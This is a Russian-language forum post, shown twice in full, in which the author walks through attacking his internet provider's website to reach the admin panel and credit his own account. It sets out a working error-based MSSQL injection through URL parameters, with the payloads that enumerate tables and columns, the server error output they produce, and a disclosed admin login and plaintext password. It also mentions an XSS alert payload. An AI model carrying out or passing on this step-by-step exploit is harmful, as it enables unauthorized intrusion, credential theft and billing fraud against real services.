D1mOn
26.02.2006, 22:13
Вступление
Сидел я дома, скучно, решил поискать баги на сайте своего прова. Нашёл несколько бестолковых XSS но для прова довольно глупых, на странице входа в свой счёт в форме ввода пароля срабатывал простейший код алерта:<script>alert()<script>Но XSS меня не интересовали. Моей целью было попасть в админку сайта, где можно было начилсять деньги на инет))
Нашёл MSSQL-Injection, но так как я не особо в этом шарил прочитал статью, спросил на форуме (gadjet'y спасибо). И начал копать...
Реализация MSSQL-инъекции
Для начала мне надо было знать имена таблиц в базе данных, для этого выполним следующий запрос, который возвратит нам имя первой таблицы:
http://sait-prova.ru/?page_id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION _SCHEMA.TABLES)--
Этот запрос возвратил мне следующее:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'DAYS_SERV_ORD_PAY_BAL' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
DAYS_SERV_ORD_PAY_BAL - это и есть имя первой таблицы в базе данных.
Далее чтобы узнать имя второй таблицы, выполняем следующий запрос:
http://sait-prova.ru/?page_id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION _SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(''DAYS_SER V_ORD_PAY_BAL'))--
После выполнения этого запроса, скрипт вернул мне следующее
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'X_Count_Of_Jeo_Modems' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Где, X_Count_Of_Jeo_Modems - как вы уже догадались, имя второй таблицы.
Чтобы узнать имя третей таблицы выполняем следующий запрос
http://sait-prova.ru/?page_id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION _SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(''DAYS_SER V_ORD_PAY_BAL','X_Count_Of_Jeo_Modems'))--
В общем технология думаю ясна, для тех кто не понял, в скобки через запятую в кавычках нужно добавлять имя таблицы, которое возвращает скрипт.
После того как я узнал имена где т 40 таблиц, и не нашёл нужной мне таблицы, решил попробовать следующий запрос:
http://sait-prova.ru/?page_id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION _SCHEMA.TABLES+WHERE+TABLE_NAME+LIKE+'%25login%25' )--
Этот запрос возвращает нам имя таблицы которая соответствует критерию login:
Запрос вернул мне следующее:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'RAS_Accounts_AutoLogins' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Но это было не то что мне нужно, я решил попробовать вместо login подставить admin, и тут мне повезло)
Срипт возвратил мне следующее:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Далее мне нужно было узнать имена столбцов в таблице admin, для этого выполняем слудеющий запрос:
http://sait-prova.ru/?page_id=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATIO N_SCHEMA.COLUMNS+WHERE+TABLE_NAME='admin')--
Вернуло мне:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Login' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Чтобы узнать имя следующего столбца выполняем запрос:
http://sait-prova.ru/?page_id=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATIO N_SCHEMA.COLUMNS+WHERE+TABLE_NAME='admin'+AND+COLU MN_NAME+NOT+IN+('login'))--
Скрипт вернул мне:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_password' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Продолжая мы получим остальные имена столбцов, пока скрипт не вернёт следующую ошибку:
error '80020009'
Exception occurred.
/Shared/Functions/InterfaceFunctions.asp, line 86
Теперь зная имена столбцов мы можем получить нужные нам данные.
Выполним запрос который вернёт нам логин админа:
http://sait-prova.ru/?page_id=(SELECT+TOP+1+Login+FROM+admin)--
Скрипт вернул следующее:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'MW-056417' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Так логин есть, это - MW-056417
Теперь узнаём пароль, запрос следующий:
(UNION+SELECT+TOP+1+admin_password+FROM+admin)--
Скрипт возвращает:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'f1Ab7wxt2' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Пароль в бд находился в чистом виде))
Ну вот собственно и всё. Спасибо gadjet'y за помощь.
Сидел я дома, скучно, решил поискать баги на сайте своего прова. Нашёл несколько бестолковых XSS но для прова довольно глупых, на странице входа в свой счёт в форме ввода пароля срабатывал простейший код алерта:<script>alert()<script>Но XSS меня не интересовали. Моей целью было попасть в админку сайта, где можно было начилсять деньги на инет))
Нашёл MSSQL-Injection, но так как я не особо в этом шарил прочитал статью, спросил на форуме (gadjet'y спасибо). И начал копать...
Реализация MSSQL-инъекции
Для начала мне надо было знать имена таблиц в базе данных, для этого выполним следующий запрос, который возвратит нам имя первой таблицы:
http://sait-prova.ru/?page_id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION _SCHEMA.TABLES)--
Этот запрос возвратил мне следующее:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'DAYS_SERV_ORD_PAY_BAL' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
DAYS_SERV_ORD_PAY_BAL - это и есть имя первой таблицы в базе данных.
Далее чтобы узнать имя второй таблицы, выполняем следующий запрос:
http://sait-prova.ru/?page_id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION _SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(''DAYS_SER V_ORD_PAY_BAL'))--
После выполнения этого запроса, скрипт вернул мне следующее
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'X_Count_Of_Jeo_Modems' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Где, X_Count_Of_Jeo_Modems - как вы уже догадались, имя второй таблицы.
Чтобы узнать имя третей таблицы выполняем следующий запрос
http://sait-prova.ru/?page_id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION _SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(''DAYS_SER V_ORD_PAY_BAL','X_Count_Of_Jeo_Modems'))--
В общем технология думаю ясна, для тех кто не понял, в скобки через запятую в кавычках нужно добавлять имя таблицы, которое возвращает скрипт.
После того как я узнал имена где т 40 таблиц, и не нашёл нужной мне таблицы, решил попробовать следующий запрос:
http://sait-prova.ru/?page_id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION _SCHEMA.TABLES+WHERE+TABLE_NAME+LIKE+'%25login%25' )--
Этот запрос возвращает нам имя таблицы которая соответствует критерию login:
Запрос вернул мне следующее:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'RAS_Accounts_AutoLogins' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Но это было не то что мне нужно, я решил попробовать вместо login подставить admin, и тут мне повезло)
Срипт возвратил мне следующее:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Далее мне нужно было узнать имена столбцов в таблице admin, для этого выполняем слудеющий запрос:
http://sait-prova.ru/?page_id=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATIO N_SCHEMA.COLUMNS+WHERE+TABLE_NAME='admin')--
Вернуло мне:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Login' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Чтобы узнать имя следующего столбца выполняем запрос:
http://sait-prova.ru/?page_id=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATIO N_SCHEMA.COLUMNS+WHERE+TABLE_NAME='admin'+AND+COLU MN_NAME+NOT+IN+('login'))--
Скрипт вернул мне:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_password' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Продолжая мы получим остальные имена столбцов, пока скрипт не вернёт следующую ошибку:
error '80020009'
Exception occurred.
/Shared/Functions/InterfaceFunctions.asp, line 86
Теперь зная имена столбцов мы можем получить нужные нам данные.
Выполним запрос который вернёт нам логин админа:
http://sait-prova.ru/?page_id=(SELECT+TOP+1+Login+FROM+admin)--
Скрипт вернул следующее:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'MW-056417' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Так логин есть, это - MW-056417
Теперь узнаём пароль, запрос следующий:
(UNION+SELECT+TOP+1+admin_password+FROM+admin)--
Скрипт возвращает:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'f1Ab7wxt2' to a column of data type smallint.
/Shared/Functions/F2.asp, line 76
Пароль в бд находился в чистом виде))
Ну вот собственно и всё. Спасибо gadjet'y за помощь.